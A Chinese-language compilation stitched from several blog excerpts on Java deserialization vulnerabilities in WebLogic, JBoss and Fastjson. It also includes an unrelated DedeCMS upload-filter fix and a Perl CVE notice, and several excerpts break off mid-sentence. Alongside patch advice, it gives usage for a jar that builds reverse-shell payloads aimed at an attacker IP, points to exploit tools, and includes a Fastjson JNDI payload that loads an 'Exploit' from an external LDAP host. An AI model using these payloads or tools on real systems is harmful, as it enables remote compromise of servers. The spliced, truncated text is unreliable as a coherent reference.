漏洞

0x00 前言 目前oracle还没有在公开途径发布weblogic的JAVA反序列化漏洞的官方补丁，目前看到的修复方法无非两条： 使用SerialKiller替换进行序列化操作的ObjectInputStream类; 在不影响业务的情况下，临时删除掉项目里的 “org/apache/commons/collections/functors/InvokerTransformer.class”文件。 ObjectInputStream类为JRE的原生类，InvokerTransformer.class为weblogic基础包中的类，对上述两个类进行修改或删除，实在无法保证对业务没有影响。如果使用上述的修复方式，需要大量的测试工作。且仅仅删除InvokerTransformer.class文件，无法保证以后不会发现其他的类存在反序列化漏洞。 因此本文针对weblogic的JAVA序列化漏洞进行了分析，对多个版本的weblogic进行了测试，并提出了更加切实可行的修复方法。 0x01 为什么选择weblogic的JAVA反序列化漏洞进行分析 weblogic与websphere为金融行业使用较多的企业级JAVA中间件； weblogic比websphere市场占有率高； 利用websphere的JAVA反序列化漏洞时需要访问8880端口，该端口为websphere的wsadmin服务端口

为了方便小伙伴们使用，我导出了两个jar包，分别用于制作反弹shell的payload和测试的payload。 使用方法和利用方法请仔细看下面的截图： 1、制作反弹shell的payload并利用： 命令： java -jar makeshell.jar 你的IP 监听端口 payload名 如： java -jar makeshell.jar 202.112.221.32 8888 D:\\java\\shellpayload 1、制作POC的payload并利用： 命令： java -jar makepoc.jar 请求的URL payload名 如： java -jar makpoc.jar http://www.xxxxx.org/xxooxxooxxoo.txt D:\\java\\pocpayload 脚本下载： http://pan.baidu.com/s/1hrfjdDM 仅供运维测试漏洞，请勿非法使用，否则后果自负！ 来源： CSDN 作者： aaa0404524 链接： https://blog.csdn.net/aaa0404524/article/details/50655443

1）java反序列化漏洞请百度。 2）对策： ObjectInputStream.readObject()的地方改为 附件中的 SerialKiller.readObject()。 附件有2个文件： SerialKiller.conf为配置文件，可以指定白名单，仅仅对白名单中的类反序列化 SerialKiller.java为ObjectInputStream的子类，覆盖了resolveClass方法（此会被readObject（）方法调用），加入了类名检查，确保反序列的是安全的类。 可以将附件的2个文件复制到你的项目中，或者将附件的maven项目编译为jar文件使用。 来源： CSDN 作者： xinglijun1973 链接： https://blog.csdn.net/xinglijun1973/article/details/84896859

Weblogic反序列化漏洞 Java 提供了一种对象序列化的机制，该机制中，一个对象可以被表示为一个字节序列，该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。 将序列化对象写入文件之后，可以从文件中读取出来，并且对它进行反序列化，也就是说，对象的类型信息、对象的数据，还有对象中的数据类型可以用来在内存中新建对象。 整个过程都是 Java 虚拟机（JVM）独立的，也就是说，在一个平台上序列化的对象可以在另一个完全不同的平台上反序列化该对象。 漏洞描述： 序列化指的是把对象转换成字节流，便于保存在内存、文件、数据库中；而反序列化则是其逆过程，由字节流还原成对象。Java中ObjectOutputStream类的writeObject()方法可以实现序列化，ObjectInputStream类的readObject()方法用于反序列化。 序列化：将java的对象转换为字节序列的过程叫做序列化 反序列化：将字节对象转换为Java的对象的过程叫做反序列化 通常情况下，序列化有两种用途：， 1）把对象的字节序列永久的保存在硬盘中 2）在网络上传输对象的字节序列 由于WebLogic采用黑名单的方式过滤危险的反序列化类，所以只要找到不在黑名单范围内的反序列化类就可以绕过过滤，执行系统命令。这次的漏洞就是利用了这一点，通过 JRMP（Java Remote

目录 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271） Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628） Weblogic反序列化漏洞（CVE-2019-2725） JBOSS反序列化漏洞 JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504） JBoss 5.x/6.x 反序列化漏洞复现（CVE-2017-12149） JBoss JMXInvokerServlet 反序列化漏洞 RMI反序列化漏洞 Fastjson反序列化漏洞 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271） Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。 这个漏洞利用工具是：java反序列终极化工具.jar 我们先启动靶机环境，访问： http://192.168.10.13:7001/ 打开我们的 java反序列终极化工具.jar工具，选择Weblogic

据Oracle、Cert及我们自测，受影响版本包括但不限于： - 9.2.3.0 - 9.2.4.0 - 10.0.0.0 - 10.0.1.0 - 10.0.2.0 - 10.2.6.0 - 10.3.0.0 - 10.3.1.0 - 10.3.2.0 - 10.3.3.0 - 10.3.4.0 - 10.3.5.0 - 10.3.6.0 - 12.1.1.0 - 12.1.2.0 - 12.1.3.0 - 12.2.1.0 JAVA反序列化漏洞检测工具 下载地址： http://download.csdn.net/detail/igangnamstyle/9494215 运行 java - jar WebLogic_EXP.jar 非oracle官方修复方法（需重启weblogic）： Apache官方最近发布了commons-collections的新版本，下载地址： http://commons.apache.org/proper/commons-collections/download_collections.cgi 或 http://download.csdn.net/detail/igangnamstyle/9494217 修复方法为替换有漏洞的commons-collections组件 建议：原来是3.2.x就替换为3.2.2，原来是4.x就替换为4.4.1

目录 反序列化漏洞 序列化和反序列化 JAVA WEB中的序列化和反序列化 对象序列化和反序列范例 JAVA中执行系统命令 重写readObject()方法 Apache Commons Collections 反序列化漏洞payload JAVA Web反序列化漏洞的挖掘和利用 由于本人并非JAVA程序员，所以对JAVA方面的知识不是很懂，仅仅是能看懂而已。本文参照几位大佬的博客进行归纳总结，给大家阐述了JAVA反序列化漏洞的原理以及Payload的构造，文章末尾会放出参考链接。 反序列化漏洞 JAVA反序列化漏洞到底是如何产生的？ 1、由于很多站点或者RMI仓库等接口处存在java的反序列化功能，于是攻击者可以通过构造特定的恶意对象序列化后的流，让目标反序列化，从而达到自己的恶意预期行为，包括命令执行，甚至 getshell 等等。 2、Apache Commons Collections是开源小组Apache研发的一个 Collections 收集器框架。这个框架中有一个InvokerTransformer.java接口，实现该接口的类可以通过调用java的反射机制来调用任意函数，于是我们可以通过调用Runtime.getRuntime.exec() 函数来执行系统命令。Apache commons collections包的广泛使用，也导致了java反序列化漏洞的大面积流行

近段时间老是发现网站title被注入其他信息，应该是被植入***还是什么的，非常困闹，在网站找了一些织梦漏洞的修补方法。 任意文件上传漏洞修复 一、/include/dialog/select_soft_post.php文件，搜索(大概在72行的样子) $fullfilename = $cfg_basedir.$activepath.'/'.$filename; 修改为 if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($filename))) { ShowMsg("你指定的文件名被系统禁止！",'javascript:;'); exit(); } $fullfilename = $cfg_basedir.$activepath.'/'.$filename;; 　　二、后台文件任意上传漏洞 /dede/media_add.php或者/你的后台名字/media_add.php 　　 搜索$fullfilename = $cfg_basedir.$filename;(大概在69行左右) 替换成 if (preg_match('#.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0

payload: 1、{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap:// . ***.com.8em7js.ceye.io:1389/Exploit", "autoCommit":true}【8em7js.ceye.io在http://dnslog.cn/中获取】 2、{"a":"a\x https://github.com/RealBearcat/Fastjson-Payload 来源： https://www.cnblogs.com/yoyoyang/p/11989785.html

升级修复代码： yum update perl yum update perl-ExtUtils-Install yum update perl-Pod-Escapes yum update perl-devel yum update perl-libs yum update perl-macros 漏洞描述 5.26.3之前的Perl和5.28.1之前的5.28.x通过精心设计的正则表达式触发缓冲区溢出，触发无效的写操作。 基本信息 CVE编号: CVE-2018-18311 漏洞类型: 缓冲区溢出 危险等级: 高危 披露时间: 2018-12-12 参考链接 https://www.cvedetails.com/cve/CVE-2018-18311 来源： https://www.cnblogs.com/michaelluthor/p/11988690.html